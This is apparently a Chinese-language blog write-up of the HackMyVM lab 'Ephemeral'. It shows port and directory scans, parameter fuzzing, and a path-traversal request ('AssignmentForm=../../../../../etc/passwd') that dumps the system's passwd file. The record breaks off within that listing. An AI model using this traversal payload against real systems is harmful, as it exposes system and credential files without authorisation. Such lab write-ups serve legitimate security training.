{"id":667,"date":"2024-04-30T17:42:16","date_gmt":"2024-04-30T09:42:16","guid":{"rendered":"http:\/\/162.14.82.114\/?p=667"},"modified":"2024-04-30T17:42:16","modified_gmt":"2024-04-30T09:42:16","slug":"hmv-_-ephemeral","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/667\/04\/30\/2024\/","title":{"rendered":"hmv[-_-]Ephemeral"},"content":{"rendered":"

Ephemeral<\/h1>\n

\"image-20240430135221500\"<\/div>
\n
\"image-20240430135528314\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ rustscan -a 192.168.0.148 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.148:21\nOpen 192.168.0.148:22\nOpen 192.168.0.148:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 0a:0d:44:3c:38:8f:c0:6d:5d:72:18:e6:d9:12:3e:57 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCp0CHgyqyNh4SkWN3U\/RBNxdPfxovfPkv76iLRZaLvvoYM2W1QUsOoH3YaXmKj9FpHpkrc4EGy2OlOCqVVCy4XxagSyLuM1d0r\/lHExM130qQ3RGmw3UBIQ2QW3gkk9rVKAD0Rq6QIXA4WMC5fIqbCPtO8bVOUBOYQcMB9LqvZnq\/U6YTWFswBwLUnz3hC9+swoJf1bPduvsnlsAh0fbq11hDwf07K8N909uq7deZFpW8tHc9CBbV36XNP9ZBTrzkAY34dd+HdYLfFwYTDwcNY\/IeiA5Fda9rrJ3CrHJWhiSEZmRSiNHKbpIVhEItOCGL2CiV9xKQ8I9S49oHSxmnegfDn44kPC\/Q7pSg1zi3uOynExvnvrFiRdmcHNUJan6J42eRXMKXhz2HF0w4MJMvSkfXCOqYI+AOT30DSri8cAbJ22wkBoMqdHqPxphRar3Vi7P\/Dd0hphcEd6W8Cc4Q4qWgUu7ZLeWexLm1Q1y+34c\/ZOh1FbeQdpKMlvyUyPCc=\n|   256 4d:7d:ba:6f:a9:88:ea:a2:34:3a:6a:0c:3a:27:1c:d5 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCqt1OTJw7IiSOOAgyywjGQ1SOmIaKCP8n20uHpYR9p05bmivNL3gZprRJHVT4zYbGNE6ww8Ijq7\/XVXL5DK\/kU=\n|   256 74:36:bf:af:8a:53:0a:c1:7f:ca:2e:a1:5c:c5:25:ad (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOlgxVeTDNdBhlFLjaLPbFFsOyH6868QxDj7wfXzjgaW\n80\/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n|_http-title: AutoWash - Car Wash Website Template\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u53d1\u73b0<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.148\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.148\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,zip,bak,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 39494]\n\/contact.html         (Status: 200) [Size: 15151]\n\/img                  (Status: 301) [Size: 312] [--> http:\/\/192.168.0.148\/img\/]\n\/about.html           (Status: 200) [Size: 18464]\n\/blog.html            (Status: 200) [Size: 20094]\n\/mail                 (Status: 301) [Size: 313] [--> http:\/\/192.168.0.148\/mail\/]\n\/service.html         (Status: 200) [Size: 16853]\n\/css                  (Status: 301) [Size: 312] [--> http:\/\/192.168.0.148\/css\/]\n\/team.html            (Status: 200) [Size: 18605]\n\/lib                  (Status: 301) [Size: 312] [--> http:\/\/192.168.0.148\/lib\/]\n\/js                   (Status: 301) [Size: 311] [--> http:\/\/192.168.0.148\/js\/]\n\/cd                   (Status: 301) [Size: 311] [--> http:\/\/192.168.0.148\/cd\/]\n\/location.html        (Status: 200) [Size: 14685]\n\/price                (Status: 301) [Size: 314] [--> http:\/\/192.168.0.148\/price\/]\n\/price.html           (Status: 200) [Size: 14635]\n\/prices               (Status: 301) [Size: 315] [--> http:\/\/192.168.0.148\/prices\/]\n\/LICENSE.txt          (Status: 200) [Size: 1309]\n\/single.html          (Status: 200) [Size: 48856]\n\/booking.html         (Status: 200) [Size: 14677]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/phpsysinfo.php       (Status: 200) [Size: 69419]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20240430135938274\"<\/div>
\n
\"image-20240430140010829\"<\/div><\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ http get http:\/\/192.168.0.148\/         \nHTTP\/1.1 200 OK\nAccept-Ranges: bytes\nConnection: Keep-Alive\nContent-Encoding: gzip\nContent-Length: 4290\nContent-Type: text\/html\nDate: Tue, 30 Apr 2024 06:03:16 GMT\nETag: "9a46-5b171bffcf480-gzip"\nKeep-Alive: timeout=5, max=100\nLast-Modified: Mon, 12 Oct 2020 04:29:54 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ curl -s -i http:\/\/192.168.0.148\/ | grep "hmv"\n<\/code><\/pre>\n
\u4e00\u76f4\u52a0\u8f7d\u4e0d\u51fa\u6765\uff0c\u5148\u7528\u522b\u7684\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ curl -s -i http:\/\/192.168.0.148\/blog.html | html2text | uniq\nHTTP\/1.1 200 OK Date: Tue, 30 Apr 2024 06:05:04 GMT Server: Apache\/2.4.41\n(Ubuntu) Last-Modified: Mon, 12 Oct 2020 04:26:44 GMT ETag: "4e7e-\n5b171b4a9c900" Accept-Ranges: bytes Content-Length: 20094 Vary: Accept-Encoding\nContent-Type: text\/html\n\n******_AutoWash_******\n**** Opening Hour ****\nMon - Fri, 8:00 - 9:00\n**** Call Us ****\n+012 345 6789\n**** Email Us ****\ninfo@example.com\n\n MENU\nHome About Service Price Washing_Points\nPages\nBlog_Grid Detail_Page Team_Member Schedule_Booking\nContact\nGet_Appointment\n\n***** Blog Grid *****\nHome Blog\n\nOur Blog\n***** Latest news & articles *****\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n[Image]\n01 Jan 2045\n**** Lorem_ipsum_dolor_sit_amet ****\nLorem ipsum dolor sit amet elit. Pellent iaculis blandit lorem, quis convall\ndiam eleife. Nam in arcu sit amet massa ferment quis enim. Nunc augue velit\nmetus congue eget semper\nAdmin\nWeb Design\n15 Comments\n    * Previous\n    * 1\n    * 2\n    * 3\n    * Next\n\n***** Get In Touch *****\n123 Street, New York, USA\n+012 345 67890\ninfo@example.com\n\n***** Popular Links *****\nAbout Us Contact Us Our Service Service Points Pricing Plan\n***** Useful Links *****\nTerms of use Privacy policy Cookies Help FQAs\n***** Newsletter *****\n[                    ] [                    ] Submit\n\u00a9 Your_Site_Name, All Right Reserved. Designed By HTML_Codex<\/code><\/pre>\n
http:\/\/192.168.0.148\/price.html<\/code><\/pre>\n
\"image-20240430141137751\"<\/div><\/p>\n
http:\/\/192.168.0.148\/phpsysinfo.php<\/code><\/pre>\n
\"image-20240430141245321\"<\/div>
\n
\"image-20240430143043243\"<\/div>
\n
\"image-20240430141608085\"<\/div>
\n
\"image-20240430141644554\"<\/div><\/p>\n
\u5c1d\u8bd5\u770b\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff0c\u4f46\u662f\u65e0\u679c\uff0c\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u5b50\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral]\n\u2514\u2500$ feroxbuster -u http:\/\/192.168.0.148\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 3 -s 200 301 302\n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13                 ver: 2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/192.168.0.148\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.2\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 3\n \ud83c\udf89  New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n301      GET        9l       28w      312c http:\/\/192.168.0.148\/img => http:\/\/192.168.0.148\/img\/\n200      GET      125l      806w    65020c http:\/\/192.168.0.148\/img\/blog-2.jpg\n200      GET       65l      166w     2598c http:\/\/192.168.0.148\/mail\/contact.js\n301      GET        9l       28w      313c http:\/\/192.168.0.148\/mail => http:\/\/192.168.0.148\/mail\/\n301      GET        9l       28w      312c http:\/\/192.168.0.148\/css => http:\/\/192.168.0.148\/css\/\n301      GET        9l       28w      312c http:\/\/192.168.0.148\/lib => http:\/\/192.168.0.148\/lib\/\n200      GET      168l      960w     4092c http:\/\/192.168.0.148\/lib\/easing\/easing.js\n200      GET        1l       38w     2303c http:\/\/192.168.0.148\/lib\/easing\/easing.min.js\n200      GET       11l      188w    16964c http:\/\/192.168.0.148\/lib\/animate\/animate.min.css\n200      GET        0l        0w        0c http:\/\/192.168.0.148\/lib\/waypoints\/links.php\n301      GET        9l       28w      311c http:\/\/192.168.0.148\/js => http:\/\/192.168.0.148\/js\/\n200      GET      130l      236w     3347c http:\/\/192.168.0.148\/js\/main.js\n301      GET        9l       28w      311c http:\/\/192.168.0.148\/cd => http:\/\/192.168.0.148\/cd\/\n301      GET        9l       28w      314c http:\/\/192.168.0.148\/price => http:\/\/192.168.0.148\/price\/\n301      GET        9l       28w      315c http:\/\/192.168.0.148\/prices => http:\/\/192.168.0.148\/prices\/\n200      GET        0l        0w        0c http:\/\/192.168.0.148\/prices\/filedownload.php\n200      GET       86l      492w    39976c http:\/\/192.168.0.148\/img\/blog-1.jpg\n200      GET       16l       66w     5067c http:\/\/192.168.0.148\/img\/testimonial-1.jpg\n200      GET       42l      112w     1327c http:\/\/192.168.0.148\/lib\/flaticon\/font\/flaticon.css\n200      GET      293l      688w    14685c http:\/\/192.168.0.148\/location.html\n200      GET       20l      106w     7346c http:\/\/192.168.0.148\/img\/testimonial-3.jpg\n200      GET      214l     1439w   143119c http:\/\/192.168.0.148\/img\/carousel-3.jpg\n200      GET        7l      279w    42766c http:\/\/192.168.0.148\/lib\/owlcarousel\/owl.carousel.min.js\n200      GET     2056l     3970w    38262c http:\/\/192.168.0.148\/css\/style.css\n200      GET       84l      436w    33981c http:\/\/192.168.0.148\/img\/team-4.jpg\n200      GET        6l       47w     4281c http:\/\/192.168.0.148\/img\/testimonial-4.jpg\n200      GET        6l       64w     2936c http:\/\/192.168.0.148\/lib\/owlcarousel\/assets\/owl.carousel.min.css\n200      GET      767l     1986w    39494c http:\/\/192.168.0.148\/index.html\n200      GET       15l       85w     6525c http:\/\/192.168.0.148\/img\/testimonial-2.jpg\n200      GET      379l     1032w    20094c http:\/\/192.168.0.148\/blog.html\n200      GET      758l     2363w    48856c http:\/\/192.168.0.148\/single.html\n200      GET      101l      553w    40061c http:\/\/192.168.0.148\/img\/team-2.jpg\n200      GET      293l      687w    14677c http:\/\/192.168.0.148\/booking.html\n200      GET       52l      421w    31803c http:\/\/192.168.0.148\/img\/team-1.jpg\n200      GET      290l      682w    14635c http:\/\/192.168.0.148\/price.html\n200      GET        1l        1w     1360c http:\/\/192.168.0.148\/lib\/flaticon\/backup.txt\n200      GET      291l      705w    15151c http:\/\/192.168.0.148\/contact.html\n200      GET        1l      245w    14877c http:\/\/192.168.0.148\/mail\/jqBootstrapValidation.min.js\n200      GET      340l      910w    16853c http:\/\/192.168.0.148\/service.html\n200      GET       78l      460w    35288c http:\/\/192.168.0.148\/img\/blog-3.jpg\n200      GET       11l       56w     2406c http:\/\/192.168.0.148\/lib\/counterup\/counterup.min.js\n200      GET      377l      893w    18464c http:\/\/192.168.0.148\/about.html\n200      GET      366l      857w    18605c http:\/\/192.168.0.148\/team.html\n200      GET      199l     1296w   122966c http:\/\/192.168.0.148\/img\/carousel-2.jpg\n200      GET        7l      158w     9028c http:\/\/192.168.0.148\/lib\/waypoints\/waypoints.min.js\n200      GET      296l     1708w   148853c http:\/\/192.168.0.148\/img\/about.jpg\n200      GET      241l     1306w   111758c http:\/\/192.168.0.148\/img\/carousel-1.jpg\n200      GET       73l      388w    29305c http:\/\/192.168.0.148\/img\/team-3.jpg\n200      GET       16l       84w     7150c http:\/\/192.168.0.148\/img\/post-3.jpg\n200      GET       20l       98w     7813c http:\/\/192.168.0.148\/img\/post-5.jpg\n200      GET       19l      116w     7958c http:\/\/192.168.0.148\/img\/post-4.jpg\n200      GET      469l     2466w   189485c http:\/\/192.168.0.148\/img\/single.jpg\n200      GET      319l     1812w   123171c http:\/\/192.168.0.148\/img\/page-header.jpg\n200      GET       18l       76w     6428c http:\/\/192.168.0.148\/img\/user.jpg\n200      GET       18l       83w     5996c http:\/\/192.168.0.148\/img\/post-1.jpg\n200      GET       15l      116w     9206c http:\/\/192.168.0.148\/img\/post-2.jpg\n200      GET      767l     1986w    39494c http:\/\/192.168.0.148\/\n200      GET     1579l     2856w    25427c http:\/\/192.168.0.148\/lib\/animate\/animate.css\n200      GET       23l      172w     1090c http:\/\/192.168.0.148\/lib\/owlcarousel\/LICENSE\n200      GET     3275l     9533w    85368c http:\/\/192.168.0.148\/lib\/owlcarousel\/owl.carousel.js\n[####################] - 82s   220661\/220661  0s      found:60      errors:0      \n[####################] - 81s   220546\/220546  2716\/s  http:\/\/192.168.0.148\/ \n[####################] - 3s    220546\/220546  78992\/s http:\/\/192.168.0.148\/img\/ => Directory listing\n[####################] - 3s    220546\/220546  66052\/s http:\/\/192.168.0.148\/mail\/ => Directory listing\n[####################] - 3s    220546\/220546  65405\/s http:\/\/192.168.0.148\/css\/ => Directory listing\n[####################] - 3s    220546\/220546  70417\/s http:\/\/192.168.0.148\/lib\/ => Directory listing\n[####################] - 3s    220546\/220546  70327\/s http:\/\/192.168.0.148\/lib\/animate\/ => Directory listing\n[####################] - 3s    220546\/220546  70620\/s http:\/\/192.168.0.148\/lib\/easing\/ => Directory listing\n[####################] - 3s    220546\/220546  63963\/s http:\/\/192.168.0.148\/lib\/waypoints\/ => Directory listing\n[####################] - 4s    220546\/220546  62620\/s http:\/\/192.168.0.148\/lib\/counterup\/ => Directory listing\n[####################] - 3s    220546\/220546  63121\/s http:\/\/192.168.0.148\/lib\/owlcarousel\/ => Directory listing\n[####################] - 0s    220546\/220546  27568250\/s http:\/\/192.168.0.148\/js\/ => Directory listing\n[####################] - 0s    220546\/220546  18378833\/s http:\/\/192.168.0.148\/cd\/ => Directory listing\n[####################] - 0s    220546\/220546  13784125\/s http:\/\/192.168.0.148\/price\/ => Directory listing\n[####################] - 0s    220546\/220546  10024818\/s http:\/\/192.168.0.148\/prices\/ => Directory listing\n[####################] - 0s    220546\/220546  2100438\/s http:\/\/192.168.0.148\/lib\/flaticon\/ => Directory listing<\/code><\/pre>\n
\u5c1d\u8bd5\u591a\u4e2a\u76ee\u5f55\u6ca1\u6709\u53d1\u73b0\uff0c\u5f97\u5c1d\u8bd5FUZZ\u4e00\u4e0b\uff1a<\/p>\n
\u654f\u611f\u76ee\u5f55\u5927\u81f4\u5982\u4e0b\uff1a<\/p>\n
\"image-20240430150538189\"<\/div>
\n
\"image-20240430150639493\"<\/div><\/p>\n
\u6ca1\u6709\u6536\u83b7\uff0c\u8fd8\u6709\u654f\u611f\u7684php\u6587\u4ef6\uff1a<\/p>\n
http:\/\/192.168.0.148\/prices\/filedownload.php<\/code><\/pre>\n
\u6ca1\u6709\u4e1c\u897f\uff0c\u4f46\u662f\u9614\u4ee5\u5c1d\u8bd5fuzz\u3002<\/p>\n
FUZZ<\/h3>\n
\u5c1d\u8bd5\u6dfb\u52a0dns\u89e3\u6790\u8fdb\u884cfuzz\uff1a<\/p>\n
192.168.0.148   ephemeral.hmv<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884cfuzz\uff1a<\/p>\n
ffuf -u http:\/\/ephemeral.hmv -H "HOST: FUZZ.ephemeral.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt \nffuf -u http:\/\/ephemeral.hmv -H "HOST: FUZZ.ephemeral.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt -fw 19456\nffuf -u http:\/\/ephemeral.hmv -H "HOST: FUZZ.ephemeral.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fw 19456\nffuf -u http:\/\/ephemeral.hmv -H "HOST: ephemeral.FUZZ.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fw 19456\nffuf -u http:\/\/ephemeral.hmv -H "HOST: ephemeral.hmv.FUZZ" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fw 19456<\/code><\/pre>\n
\u4f46\u662f\u6ca1\u7ed3\u679c\uff0c\u5c1d\u8bd5fuzz\u4e00\u4e0bLFI\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u9776\u573a\u786e\u5b9e\u6709\u70b9\u9634\u95f4\uff0c\u4e3b\u8981\u662f\u5b57\u5178\u4e0a\u7684\uff0c\u8bf7\u89c1vcr\u3002\u3002<\/p>\n
\"image-20240430151115213\"<\/div><\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Ephemeral]\n\u2514\u2500# ffuf -w \/usr\/share\/seclists\/Discovery\/Web-Content\/burp-parameter-names.txt -u http:\/\/192.168.0.148\/prices\/filedownload.php?FUZZ=..\/..\/..\/..\/..\/etc\/passwd -fs 0\n\n        \/'___\\  \/'___\\           \/'___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.148\/prices\/filedownload.php?FUZZ=..\/..\/..\/..\/..\/etc\/passwd\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/Web-Content\/burp-parameter-names.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response size: 0\n________________________________________________\n\nAssignmentForm          [Status: 200, Size: 3091, Words: 40, Lines: 54, Duration: 121ms]\n:: Progress: [6453\/6453] :: Job [1\/1] :: 59 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::<\/code><\/pre>\n
\u77e5\u9053\u9634\u95f4\u5728\u54ea\u4e86\u5427\uff1a<\/p>\n
\"image-20240430150909124\"<\/div><\/p>\n
\u6709\u4e14\u552f\u4e00\uff0c\u4e0d\u77e5\u9053\u5176\u4ed6\u5e08\u5085\u548b\u505a\u7684\u3002\u3002\u3002\u3002\u8fdb\u884c\u5305\u542b\uff01<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Ephemeral]\n\u2514\u2500# curl -s -i http:\/\/192.168.0.148\/prices\/filedownload.php?AssignmentForm=..\/..\/..\/..\/..\/etc\/passwdHTTP\/1.1 200 OK\nDate: Tue, 30 Apr 2024 07:12:59 GMT\nServer: Apache\/2.4.41 (Ubuntu)\nVary: Accept-Encoding\nContent-Length: 3091\nContent-Type: text\/html; charset=UTF-8\n\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:114::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:115::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:109:116:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nusbmux:x:110:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nrtkit:x:111:117:RealtimeKit,,,:\/proc:\/usr\/sbin\/nologin\ndnsmasq:x:112:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\ncups-pk-helper:x:113:120:user for cups-pk-helper service,,,:\/home\/cups-pk-helper:\/usr\/sbin\/nologin\nspeech-dispatcher:x:114:29:Speech Dispatcher,,,:\/run\/speech-dispatcher:\/bin\/false\navahi:x:115:121:Avahi mDNS daemon,,,:\/var\/run\/avahi-daemon:\/usr\/sbin\/nologin\nkernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:\/:\/usr\/sbin\/nologin\nsaned:x:117:123::\/var\/lib\/saned:\/usr\/sbin\/nologin\nnm-openvpn:x:118:124:NetworkManager OpenVPN,,,:\/var\/lib\/openvpn\/chroot:\/usr\/sbin\/nologin\nhplip:x:119:7:HPLIP system user,,,:\/run\/hplip:\/bin\/false\nwhoopsie:x:120:125::\/nonexistent:\/bin\/false\ncolord:x:121:126:colord colour management daemon,,,:\/var\/lib\/colord:\/usr\/sbin\/nologin\ngeoclue:x:122:127::\/var\/lib\/geoclue:\/usr\/sbin\/nologin\npulse:x:123:128:PulseAudio daemon,,,:\/var\/run\/pulse:\/usr\/sbin\/nologin\ngnome-initial-setup:x:124:65534::\/run\/gnome-initial-setup\/:\/bin\/false\ngdm:x:125:130:Gnome Display Manager:\/var\/lib\/gdm3:\/bin\/false\nsssd:x:126:131:SSSD system user,,,:\/var\/lib\/sss:\/usr\/sbin\/nologin\nkevin:x:1000:1000:kevin,,,:\/home\/kevin:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nftp:x:127:134:ftp 